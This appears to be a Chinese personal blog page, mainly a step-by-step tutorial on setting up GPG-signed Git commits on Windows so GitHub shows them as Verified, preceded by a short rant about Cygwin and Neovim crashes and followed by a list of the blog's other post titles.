        ExceptionAddress: cygwin1.00007FFFDDA1A3A7
        NumberParameters: 2
ExceptionInformation[00]: 0000000000000001 Write
ExceptionInformation[01]: 0000000000000000 Inaccessible Address
第一次异常于 00007FFFDDA1A3A7 (C0000005, EXCEPTION_ACCESS_VIOLATION)！
EXCEPTION_DEBUG_INFO:
           dwFirstChance: 0
           ExceptionCode: C0000005 (EXCEPTION_ACCESS_VIOLATION)
          ExceptionFlags: 00000000
        ExceptionAddress: cygwin1.00007FFFDDA1A3A7
        NumberParameters: 2
ExceptionInformation[00]: 0000000000000001 Write
ExceptionInformation[01]: 0000000000000000 Inaccessible Address
第二次异常于 00007FFFDDA1A3A7 (C0000005, EXCEPTION_ACCESS_VIOLATION)！

...真的，之前用过 MingGW，Msys2，现在又换回 Cygwin，之前编译明着给你报错现在暗戳戳把我整得脑溢血...其实也有 nvim 的锅，一直在那报 0xc0000005 还让程序继续跑下去...这样的结果就是卡死，崩溃不好吗？😡😡kiss-translator

之后用卸了 GCC，Cygwin 还在，再清nvim-data的时候（就是把编译好的内容给删了，）已经不报错了,好耶~

虽然但是，我搞 Neovim 这三天里，几乎花了好多精力在这上面了，so wtf am i doing!？解决问题方法多，摸索的时间成本也多，哎。。。最近几天学 react 做聊天系统的计划也没时间搞了...

所以说，我为什么要碰 Neovim！！？？？？ヽ（≧□≦）ノ

...

PS: 最后还是成了玩具，再也没碰过（

...

....

Windows配置GPG签名，Github展示Verified绿标

Mon, 01 Apr 2024 00:00:00 GMT

前言

你是否羡慕别人的 Commit 旁有一个小绿标而自己旁边什么都没有？？（

嚎啊，今天和大家讲一下怎么样给 github 的提交签名。

Github 提交签名有三种方式，Github 自签（网页端操作自带），SSH 签名（要配置 SSH 密钥，没了解很深）和 GPG 签名（就是我们今天讲的）

所以说，这有什么用？

给你的 Commit 加上小绿标（Verified）
验证身份，让别人知道这不是别人冒名顶替提交上来的（比如说了 Linus 假删库那件事

这里想到了之前看的一个视频：你公开了的 repo 再设私有，通过一些操作就能随意访问 branch 的内容https://www.youtube.com/watch?v=EH3tenVGk60

不止 Git——他还能:

签名文件
文件的加解密
SSH 身份验证
...

关于用途这方面今天不展开来讨论，今天就谈谈 Git 签名这件事，作为一个 Windows 用户，这些功能日常都不太会用到

没法把 Linux 装上实体机！家里就一台游戏本和一个台式，显示器还接到游戏本上了

正文

首先，我们要在系统上有 GPG，社区提供了 GPG4Win，一个在 Windows 上的 GPG 实现。

https://www.gpg4win.org/get-gpg4win.html

下载安装，没啥好说的。

安装完，这里默认会给你安装上 Kleopatra（一个 GPG 的 GUI）并且默认打开

第一次打开没任何证书的时候，会提示你是否创建新的证书，这里就选择新建 OpenPGP 密钥对，填入名称和邮箱（算法细节可以自行更改），会来到到下面这个页面：

我们需要获取 GPG 的绝对路径：

$ where.exe gpg
D:\Program Files (x86)\GnuPG\bin\gpg.exe

然后为 Git 配置 GPG 路径：

$ git config --global gpg.program "D:\Program Files (x86)\GnuPG\bin\gpg.exe"

如果你想为一个项目的 commit 签名的话，就用 local：

$ git config --local commit.gpgsign true

反之，我给全局的 commit 都开启了签名：

$ git config --global commit.gpgsign true

接下来，我们要获取到 key 的 ID，然后让 Git 知道我们是那个身份去签名，注意一下，提交的邮箱和用户名必须要和 Git 配置（也就是.gitconfig）的名称一样！不匹配会导致 Unverified！

$ gpg --list-secret-keys --keyid-format LONG

这个 sec 后面是算法/ID，0530 就是我们想要的 ID 了

我们本地端的最后一步，配置 key id——[GPG_KEY]就是上面的 ID，配置单个项目把 global 换成 local 就可以。

$ git config --global user.signingkey "[GPG_KEY]"

之后我们的每个 commit 都是签了名的，push 上去，GH 说：

你谁啊？我不认识你！

喜提 Unverified~

要想绿标，你还得在 Github 上配置自己的 GPG 公钥，可以通过https://github.com/hexadecimal233.gpg查看。（想看别人用户名自己改啦）

导出公钥有两种方法，第一种，也是我当时的方法（纯命令行）：

$ gpg --export --armor soda114514@proton.me

然后第二种就是 Kleopatra，选择导出证书就是公钥，复制到 Github 里完全可用，十分甚至九分的方便啊!（

最后的最后！我们把公钥传到 Github 上~

https://github.com/settings/keys

这样自己 Push 的 commit 也就有绿色的 Verified 了！

结语 & 闲聊

其实写这篇文章是希望那些想要小绿标的大家能降低查文章的时间成本，想说的就这么点了（

我每次找 powershell 之前敲的代码都很费劲，用 everything 找 PSReadline 所在文件夹，再点开历史文件(C:\Users\User\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt)

笔记本上的 win11 还要被塞爆了，安装包还分开好多文件夹保存没删，编曲的音源上百 G，这不塞满才怪，还有我浏览器的收藏夹好乱（

不知道如何把子文件夹放到最开头显示，还堆着之前没分类时候塞的巨大收藏夹（YES，scj3，名字够随意）

参考：https://www.git-tower.com/blog/setting-up-gpg-windows/

12.3 Update

Push 的时候卡住了...

gpg: keydb_search failed: No agent running

gpg: skipped "CF8F4C11552208D5": No agent running

gpg: signing failed: No agent running

error: gpg failed to sign the data

fatal: failed to write commit object

看到https://superuser.com/questions/1075404/how-can-i-restart-gpg-agent/1150399#1150399说，重启 GPG agent 可以修复，试了最后也有效果

$ gpgconf --kill gpg-agent

1.30 Update

为了防止 keyserver 不知道什么时候突然失联建议在配置里边加上 keyserver hkps://keyserver.ubuntu.com 手动设定？配置目录： Win：%APPDATA%\gnupg\gpg.conf Linux: ~/.gnupg/gpg.conf

小盒子

【AI生成】影子控制：某恶意插件 SDK 动态下发与强制开关机制深度逆向

摘要

引言：伪装的艺术

第一章：表象下的伏笔 —— 默认配置的陷阱

第二章：核心中枢 —— Proconstantinator 模块

2.1 强制同步逻辑

第三章：模块化引擎 —— Yodules 架构

3.1 Yodules 的注入机制

第四章：动态路径 —— ms/gs 的生成逻辑

第五章：对抗性分析 —— 为什么用户关不掉？

第六章：反制建议

结论

被浏览器扩展给扒光了

插件还是“间谍”？从 crxMouse 偷跑数据谈浏览器扩展的安全重灾区

PS

【AI生成】晶体幻影：当硬件密钥成为地下王国的最后一道防线

一、 案件实录：代号“晶体幻影” (Writeup)

1. 初始线索：消失的流量

2. 技术拆解：单包授权与硬件锚点

3. 破局点：物理降维打击

二、 进化：超越互联网的犯罪手段

1. 私有无线电隐匿网 (SDR)

2. 生物特征“活体密钥”

3. 神经网络隐写术 (Deep Steganography)

三、 黑客硬件与开源工具库

四、 深度反思：从不信任别人的人会被黑吗？

OpenWRT旁路由IPV6解决方案【更新】

前言

网络拓扑

网络配置

WAN 口配置（获取 IPv4）

WAN6 配置（获取 IPv6 前缀）

LAN 口配置（关键避坑）

基本设置

高级设置

DHCP 服务器 → IPv6 设置

执行配置

验证 IPv6 获取

官方测试网站

公网访问

配置

DDNS

如何用 PingTunnel 绕过校园网限制

前言

1. 服务端配置 (VPS)

2. 本地客户端配置

3. 浏览器设置与测试

可能需要注意的点 💡

在 Cloudflare Workers 上部署 Bitwarden

前言

部署教程

1. 设置 Github 项目

获取并添加 secrets

2. 部署到 Cloudflare

配置环境变量与自定义域名

可选环境变量

4. 创建账户并导入数据

DIY 短信转发模块

刷前准备

启动！

其他配置

从 Nuxt 迁移到 Astro

Astro, Yes!

Astro + Svelte

为什么 Nuxt 拉了？

未来的计划

如何通过CF反代API绕过B站视频CORS限制并在首页展示最新视频

B 站 API

处理 CORS

Workers 的限制

实装

换新博客框架了

绿联NAS调教记

某云神秘的追踪参数

手机端

电脑端

总结

PDM和Pylint补全的一些问题解决

前言

第四章：动态路径 —— `ms/gs` 的生成逻辑

一、案件实录：代号“晶体幻影” (Writeup)

二、进化：超越互联网的犯罪手段

三、黑客硬件与开源工具库

四、深度反思：从不信任别人的人会被黑吗？

一、万恶之源